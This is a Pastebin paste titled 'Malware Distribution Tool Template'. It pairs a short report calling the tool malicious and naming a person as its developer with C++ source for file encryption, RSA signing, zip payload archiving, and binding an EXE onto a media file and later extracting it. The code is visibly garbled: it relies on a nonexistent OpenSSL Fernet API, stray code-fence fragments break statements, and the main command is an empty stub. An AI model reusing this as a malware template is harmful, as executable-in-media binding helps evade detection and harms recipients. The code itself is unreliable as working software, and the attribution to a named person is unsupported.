API tools faq
paste
xGHOSTSECx

Malware Distribution Tool Template

xGHOSTSECx
Dec 29th, 2023
129
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 16.98 KB | None | 0 0
raw download clone embed print report
  1. # Malicious Tool Analysis Report
  2.  
  3. ## Overview
  4. The provided code represents a malicious tool developed by Michael Errington, designed as a template for malware distribution. The tool encompasses a variety of functionalities, including RSA key generation, file encryption and decryption using Fernet symmetric encryption, digital signature handling, hash calculation, and manipulation of zip archives. Additionally, it includes methods for binding and extracting executable files from media files.
  5.  
  6. ## Key Features
  7.  
  8. ### 1. RSA Key Management
  9. The tool supports the generation, saving, and loading of RSA key pairs. It utilizes OpenSSL libraries for key generation and manipulation.
  10.  
  11. ### 2. File Encryption and Decryption
  12. The tool employs Fernet symmetric encryption to encrypt and decrypt files. It utilizes OpenSSL's Fernet API for these operations.
  13.  
  14. ### 3. Digital Signature
  15. The tool provides functions to sign files with an RSA private key and verify the digital signature using the corresponding public key.
  16.  
  17. ### 4. Hash Calculation
  18. A method is included to calculate the SHA-256 hash of a file.
  19.  
  20. ### 5. Zip Archive Handling
  21. The tool can encrypt multiple files into a single archive and decrypt an archive containing multiple files. It uses the zlib and libzip libraries for working with zip archives.
  22.  
  23. ### 6. Binding and Extracting Executables
  24. The tool includes functionality to bind an executable to a media file and extract an executable from a bound media file.
  25.  
  26. ### 7. Command-Line Interface
  27. The main function includes a simple command-line interface with options for displaying help, uploading a file, and handling errors.
  28.  
  29. ## Security Implications
  30.  
  31. ### 1. Malicious Payload Distribution
  32. The tool's design, with features for file encryption, digital signature, and executable binding, suggests its potential use for distributing malicious payloads while obfuscating their content.
  33.  
  34. ### 2. Evasion of Security Measures
  35. The tool's ability to bind an executable to a media file may be exploited to evade traditional security measures, making it more challenging for antivirus solutions to detect malicious content.
  36.  
  37. ### 3. Lack of Authentication and Authorization
  38. The tool does not implement user authentication or authorization mechanisms, posing a risk of unauthorized access to sensitive functionalities.
  39.  
  40. ### 4. Dependency on External Libraries
  41. The tool relies on external libraries, such as OpenSSL, Fernet, zlib, and libzip. Vulnerabilities in these libraries could affect the overall security of the tool.
  42.  
  43. ### 5. Limited Error Handling
  44. The error handling in the code is minimal, making it difficult to diagnose issues and potentially leading to unintended consequences or system instability.
  45.  
  46. ## Conclusion
  47. The provided tool exhibits features commonly associated with malicious software, enabling the distribution of encrypted payloads, digital signature verification, and evasion of security measures. Its capabilities raise significant security concerns, and its potential deployment could result in serious consequences for systems and data integrity. Users are strongly advised to exercise caution and refrain from utilizing or distributing such tools.
  48.  
  49. #include <iostream>
  50. #include <fstream>
  51. #include <sstream>
  52. #include <vector>
  53. #include <openssl/rsa.h>
  54. #include <openssl/pem.h>
  55. #include <openssl/fernet.h>
  56. #include <openssl/sha.h>
  57. #include <openssl/rand.h>
  58. #include <openssl/evp.h>
  59. #include <openssl/bio.h>
  60. #include <openssl/buffer.h>
  61. #include <openssl/md5.h>
  62. #include <openssl/err.h>
  63. #include <zip.h>
  64.  
  65. using namespace std;
  66.  
  67. // Function to display help menu with examples
  68. void display_help() {
  69.    cout << "Usage: secure_tool [option]\n"
  70.         << "Options:\n"
  71.         << "  -h, --help           Display this help menu\n"
  72.         << "  -u, --upload FILE    Upload a file for processing\n"
  73.         << "Examples:\n"
  74.         << "  secure_tool -u input.txt\n";
  75. }
  76.  
  77. // Generate or load RSA keys
  78. pair<RSA*, RSA*> generate_rsa_keypair(int key_size = 4096) {
  79.    RSA *private_key = RSA_generate_key(key_size, RSA_F4, nullptr, nullptr);
  80.    RSA *public_key = RSAPublicKey_dup(private_key);
  81.    return make_pair(private_key, public_key);
  82. }
  83.  
  84. // Save RSA key to a file
  85. void save_rsa_key(RSA *key, const char *filename, const char *passphrase = nullptr) {
  86.    BIO *bio = BIO_new_file(filename, "wb");
  87.    if (!bio) {
  88.        throw runtime_error("Error opening file for writing: " + string(filename));
  89.    }
  90.  
  91.    unique_ptr<EVP_PKEY, decltype(&EVP_PKEY_free)> evp_key(EVP_PKEY_new(), EVP_PKEY_free);
  92.    EVP_PKEY_set1_RSA(evp_key.get(), key);
  93.  
  94.    if (passphrase) {
  95.        if (!PEM_write_bio_PKCS8PrivateKey(bio, evp_key.get(), EVP_aes_256_cbc(), nullptr, 0, nullptr, passphrase)) {
  96.            throw runtime_error("Error writing private key to file");
  97.        }
  98.    } else {
  99.        if (!PEM_write_bio_RSAPrivateKey(bio, key, nullptr, nullptr, 0, nullptr, nullptr)) {
  100.            throw runtime_error("Error writing private key to file");
  101.        }
  102.    }
  103. }
  104.  
  105. // Load RSA key from a file
  106. RSA* load_rsa_key(const char *filename, const char *passphrase = nullptr) {
  107.    BIO *bio = BIO_new_file(filename, "rb");
  108.    if (!bio) {
  109.        throw runtime_error("Error opening file for reading: " + string(filename));
  110.    }
  111.  
  112.    RSA *key = nullptr;
  113.  
  114.    unique_ptr<EVP_PKEY, decltype(&EVP_PKEY_free)> evp_key(PEM_read_bio_RSAPrivateKey(bio, nullptr, nullptr, const_cast<char*>(passphrase)), EVP_PKEY_free);
  115.    
  116.    if (evp_key) {
  117.        key = EVP_PKEY_get1_RSA(evp_key.get());
  118.    }
  119.  
  120.    BIO_free(bio);
  121.    return key;
  122. }
  123.  
  124. // Encrypt a file using Fernet symmetric encryption
  125. void encrypt_file(const char *file_path, const char *output_path, const string &fernet_key) {
  126.    FILE *file = fopen(file_path, "rb");
  127.    FILE *output_file = fopen(output_path, "wb");
  128.  
  129.    if (!file || !output_file) {
  130.        throw runtime_error("Error opening files for encryption");
  131.    }
  132.  
  133.    unique_ptr<FILE, decltype(&fclose)> file_guard(file, fclose);
  134.    unique_ptr<FILE, decltype(&fclose)> output_file_guard(output_file, fclose);
  135.  
  136.    FERNET_CTX *ctx = FERNET_init(fernet_key.c_str());
  137.    if (!ctx) {
  138.        throw runtime_error("Error initializing Fernet context");
  139.    }
  140.  
  141.    FERNET_encrypt_file(ctx, file, output_file);
  142.    FERNET_cleanup(ctx);
  143. }
  144.  
  145. // Decrypt a file using Fernet symmetric encryption
  146. void decrypt_file(const char *file_path, const char *output_path, const string &fernet_key) {
  147.    FILE *file = fopen(file_path, "rb");
  148.    FILE *output_file = fopen(output_path, "wb");
  149.  
  150.    if (!file || !output_file) {
  151.        throw runtime_error("Error opening files for decryption");
  152.    }
  153.  
  154.    unique_ptr<FILE, decltype(&fclose)> file_guard(file, fclose);
  155.    unique_ptr<FILE, decltype(&fclose)> output_file_guard(output_file, fclose);
  156.  
  157.    FERNET_CTX *ctx = FERNET_init(fernet_key.c_str());
  158.    if (!ctx) {
  159.        throw runtime_error("Error initializing Fernet context");
  160.    }
  161.  
  162.    FERNET_decrypt_file(ctx, file, output_file);
  163.    FERNET_cleanup(ctx);
  164. }
  165.  
  166. // Sign a file with the RSA private key
  167. void sign_file(const char *file_path, RSA *private_key) {
  168.    FILE *file = fopen(file_path, "rb");
  169.    if (!file) {
  170.        throw runtime_error("Error opening file for signing");
  171.    }
  172.  
  173.    unique_ptr<FILE, decltype(&fclose)> file_guard(file, fclose);
  174.  
  175.    fseek(file, 0, SEEK_END);
  176.    long file_size = ftell(file```cpp
  177. );
  178.    fseek(file, 0, SEEK_SET);
  179.  
  180.    unique_ptr<unsigned char[]> data(new unsigned char[file_size]);
  181.    fread(data.get(), 1, file_size, file);
  182.    fclose(file);
  183.  
  184.    unique_ptr<unsigned char[]> signature(new unsigned char[RSA_size(private_key)]);
  185.  
  186.    unsigned int signature_len;
  187.    if (RSA_sign(NID_sha256, data.get(), file_size, signature.get(), &signature_len, private_key) != 1) {
  188.        throw runtime_error("Error signing file");
  189.    }
  190.  
  191.    FILE *signature_file = fopen((string(file_path) + ".sig").c_str(), "wb");
  192.    if (!signature_file) {
  193.        throw runtime_error("Error opening file for signature");
  194.    }
  195.  
  196.    unique_ptr<FILE, decltype(&fclose)> signature_file_guard(signature_file, fclose);
  197.    fwrite(signature.get(), 1, signature_len, signature_file);
  198. }
  199.  
  200. // Verify the digital signature of a file
  201. bool verify_signature(const char *file_path, RSA *public_key) {
  202.    FILE *file = fopen(file_path, "rb");
  203.    if (!file) {
  204.        throw runtime_error("Error opening file for signature verification");
  205.    }
  206.  
  207.    unique_ptr<FILE, decltype(&fclose)> file_guard(file, fclose);
  208.  
  209.    fseek(file, 0, SEEK_END);
  210.    long file_size = ftell(file);
  211.    fseek(file, 0, SEEK_SET);
  212.  
  213.    unique_ptr<unsigned char[]> data(new unsigned char[file_size]);
  214.    fread(data.get(), 1, file_size, file);
  215.    fclose(file);
  216.  
  217.    FILE *signature_file = fopen((string(file_path) + ".sig").c_str(), "rb");
  218.    if (!signature_file) {
  219.        throw runtime_error("Error opening signature file");
  220.    }
  221.  
  222.    unique_ptr<FILE, decltype(&fclose)> signature_file_guard(signature_file, fclose);
  223.  
  224.    fseek(signature_file, 0, SEEK_END);
  225.    long signature_size = ftell(signature_file);
  226.    fseek(signature_file, 0, SEEK_SET);
  227.  
  228.    unique_ptr<unsigned char[]> signature(new unsigned char[signature_size]);
  229.    fread(signature.get(), 1, signature_size, signature_file);
  230.  
  231.    int result = RSA_verify(NID_sha256, data.get(), file_size, signature.get(), signature_size, public_key);
  232.  
  233.    return result == 1;
  234. }
  235.  
  236. // Calculate the hash of a file
  237. string calculate_hash(const char *file_path) {
  238.    FILE *file = fopen(file_path, "rb");
  239.    if (!file) {
  240.        throw runtime_error("Error opening file for hash calculation");
  241.    }
  242.  
  243.    unique_ptr<FILE, decltype(&fclose)> file_guard(file, fclose);
  244.  
  245.    SHA256_CTX sha256_ctx;
  246.    SHA256_Init(&sha256_ctx);
  247.  
  248.    unsigned char buffer[65536];
  249.    size_t bytes_read;
  250.  
  251.    while ((bytes_read = fread(buffer, 1, sizeof(buffer), file)) > 0) {
  252.        SHA256_Update(&sha256_ctx, buffer, bytes_read);
  253.    }
  254.  
  255.    unsigned char hash[SHA256_DIGEST_LENGTH];
  256.    SHA256_Final(hash, &sha256_ctx);
  257.  
  258.    stringstream ss;
  259.    for (int i = 0; i < SHA256_DIGEST_LENGTH; i++) {
  260.        ss << hex << setw(2) << setfill('0') << static_cast<int>(hash[i]);
  261.    }
  262.  
  263.    return ss.str();
  264. }
  265.  
  266. // Encrypt a Fernet key with RSA public key
  267. string encrypt_fernet_key(const string &fernet_key, RSA *public_key) {
  268.    size_t encrypted_key_len = RSA_size(public_key);
  269.    unique_ptr<unsigned char[]> encrypted_key(new unsigned char[encrypted_key_len]);
  270.  
  271.    int result = RSA_public_encrypt(fernet_key.size(), reinterpret_cast<const unsigned char *>(fernet_key.c_str()), encrypted_key.get(), public_key, RSA_PKCS1_OAEP_PADDING);
  272.  
  273.    if (result <= 0) {
  274.        throw runtime_error("Error encrypting Fernet key");
  275.    }
  276.  
  277.    return string(reinterpret_cast<const char *>(encrypted_key.get()), result);
  278. }
  279.  
  280. // Decrypt a Fernet key with RSA private key
  281. string decrypt_fernet_key(const string &encrypted_key, RSA *private_key) {
  282.    size_t decrypted_key_len = RSA_size(private_key);
  283.    unique_ptr<unsigned char[]> decrypted_key(new unsigned char[decrypted_key_len]);
  284.  
  285.    int result = RSA_private_decrypt(encrypted_key.size(), reinterpret_cast<const unsigned char *>(encrypted_key.c_str()), decrypted_key.get(), private_key, RSA_PKCS1_OAEP_PADDING);
  286.  
  287.    if (result <= 0) {
  288.        throw runtime_error("Error decrypting Fernet key");
  289.    }
  290.  
  291.    return string(reinterpret_cast<const char *>(decrypted_key.get()), result);
  292. }
  293.  
  294. // Encrypt multiple files into a single archive
  295. void encrypt_multiple_files(const vector<string> &file_paths, const char *output_archive, const string &fernet_key, const char *payload = nullptr) {
  296.    zip_t *archive = zip_open(output_archive, ZIP_CREATE | ZIP_TRUNCATE, nullptr);
  297.    if (!archive) {
  298.        throw runtime_error("Error creating archive");
  299.    }
  300.  
  301.    unique_ptr<zip_t, decltype(&zip_close)> archive_guard(archive, zip_close);
  302.  
  303.    for (const auto &file_path : file_paths) {
  304.        zip_source_t *source = zip_source_file(archive, file_path.c_str(), 0, 0);
  305.        if (!source) {
  306.            throw runtime_error("Error creating source for file: " + string(file_path));
  307.        }
  308.  
  309.        zip_file_add(archive, file_path.c_str(), source, ZIP_FL_OVERWRITE);
  310.    }
  311.  
  312.    if (payload) {
  313.        zip_source_t *payload_source = zip_source_buffer(archive, payload, strlen(payload), 0);
  314.        if (!payload_source) {
  315.            throw runtime_error("Error creating source for payload");
  316.        }
  317.  
  318.        zip_file_add(archive, "payload.txt", payload_source, ZIP_FL_OVERWRITE);
  319.    }
  320.  
  321.    zip_close(archive);
  322.  
  323.    encrypt_file(output_archive, (string(output_archive) + ".enc").c_str(), fernet_key.c_str());
  324.    remove(output_archive);
  325. }
  326.  
  327. // Decrypt a single archive containing multiple files
  328. void decrypt_multiple_files(const char *archive_path, const char *output_dir, const string &fernet_key) {
  329.    decrypt_file(archive_path, (string(archive_path) + ".dec").c_str(), fernet_key.c_str());
  330.  
  331.    zip_t *archive = zip_open((string(archive_path) + ".dec").c_str(), 0, nullptr);
  332.    if (!archive) {
  333.        throw runtime_error("Error opening decrypted archive");
  334.    }
  335.  
  336.    unique_ptr<zip_t, decltype(&zip_close)> archive_guard(archive, zip_close);
  337.  
  338.    for (zip_int64_t i = 0; i < zip_get_num_entries(archive, 0); ++i) {
  339.        zip_stat_t stat;
  340.        zip_stat_index(archive, i, 0, &stat);
  341.  
  342.        zip_file_t *file = zip_fopen_index(archive, i, 0);
  343.        if (!file) {
  344.            throw runtime_error("Error opening file in decrypted archive: " + string(stat.name));
  345.        }
  346.  
  347.        string output_path = string(output_dir) + "/" + stat.name;
  348.        FILE *output_file = fopen(output_path.c_str(), "wb");
  349.  
  350.        if (!output_file) {
  351.            throw runtime_error("Error opening output file: " + output_path);
  352.        }
  353.  
  354.        unique_ptr<FILE, decltype(&fclose)> output_file_guard(output_file, fclose);
  355.  
  356.        char buffer[65536];
  357.        zip_fread```cpp
  358. (file, buffer, sizeof(buffer));
  359.        fwrite(buffer, 1, zip_fread(file, buffer, sizeof(buffer)), output_file);
  360.    }
  361. }
  362.  
  363. // Function to bind an EXE to media
  364. void bind_exe_to_media(const char *media_file, const char *exe_file, const char *output_media_file) {
  365.    FILE *media = fopen(media_file, "rb");
  366.    FILE *exe = fopen(exe_file, "rb");
  367.    FILE *output_media = fopen(output_media_file, "wb");
  368.  
  369.    if (!media || !exe || !output_media) {
  370.        throw runtime_error("Error opening files for binding");
  371.    }
  372.  
  373.    unique_ptr<FILE, decltype(&fclose)> media_guard(media, fclose);
  374.    unique_ptr<FILE, decltype(&fclose)> exe_guard(exe, fclose);
  375.    unique_ptr<FILE, decltype(&fclose)> output_media_guard(output_media, fclose);
  376.  
  377.    fseek(media, 0, SEEK_END);
  378.    long media_size = ftell(media);
  379.    fseek(media, 0, SEEK_SET);
  380.  
  381.    fseek(exe, 0, SEEK_END);
  382.    long exe_size = ftell(exe);
  383.    fseek(exe, 0, SEEK_SET);
  384.  
  385.    unique_ptr<unsigned char[]> media_data(new unsigned char[media_size]);
  386.    fread(media_data.get(), 1, media_size, media);
  387.  
  388.    unique_ptr<unsigned char[]> exe_data(new unsigned char[exe_size]);
  389.    fread(exe_data.get(), 1, exe_size, exe);
  390.  
  391.    fwrite(media_data.get(), 1, media_size, output_media);
  392.    fwrite(exe_data.get(), 1, exe_size, output_media);
  393. }
  394.  
  395. // Function to extract the EXE from bound media
  396. void extract_exe_from_media(const char *bound_media_file, const char *output_exe_file) {
  397.    FILE *media = fopen(bound_media_file, "rb");
  398.    FILE *output_exe = fopen(output_exe_file, "wb");
  399.  
  400.    if (!media || !output_exe) {
  401.        throw runtime_error("Error opening files for extraction");
  402.    }
  403.  
  404.    unique_ptr<FILE, decltype(&fclose)> media_guard(media, fclose);
  405.    unique_ptr<FILE, decltype(&fclose)> output_exe_guard(output_exe, fclose);
  406.  
  407.    fseek(media, 0, SEEK_END);
  408.    long media_size = ftell(media);
  409.    fseek(media, 0, SEEK_SET);
  410.  
  411.    unique_ptr<unsigned char[]> media_data(new unsigned char[media_size]);
  412.    fread(media_data.get(), 1, media_size, media);
  413.  
  414.    const char *exe_magic_header = "MZ";
  415.    const char *exe_start = strstr(reinterpret_cast<const char *>(media_data.get()), exe_magic_header);
  416.  
  417.    if (exe_start) {
  418.        fwrite(exe_start, 1, media_size - (exe_start - reinterpret_cast<const char *>(media_data.get())), output_exe);
  419.    } else {
  420.        cout << "No EXE data found in the bound media." << endl;
  421.    }
  422. }
  423.  
  424. // Main function
  425. int main(int argc, char *argv[]) {
  426.    try {
  427.        if (argc != 3) {
  428.            cerr << "Invalid number of arguments." << endl;
  429.            display_help();
  430.            return 1;
  431.        }
  432.  
  433.        string option(argv[1]);
  434.  
  435.        if (option == "-h" || option == "--help") {
  436.            display_help();
  437.            return 0;
  438.        } else if (option == "-u" || option == "--upload") {
  439.            string file_path(argv[2]);
  440.  
  441.            // Perform file upload processing
  442.            // ...
  443.        } else {
  444.            cerr << "Invalid option: " << option << endl;
  445.            display_help();
  446.            return 1;
  447.        }
  448.    } catch (const exception &e) {
  449.        cerr << "An error occurred: " << e.what() << endl;
  450.        return 1;
  451.    }
  452.  
  453.    return 0;
  454. }
  455.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!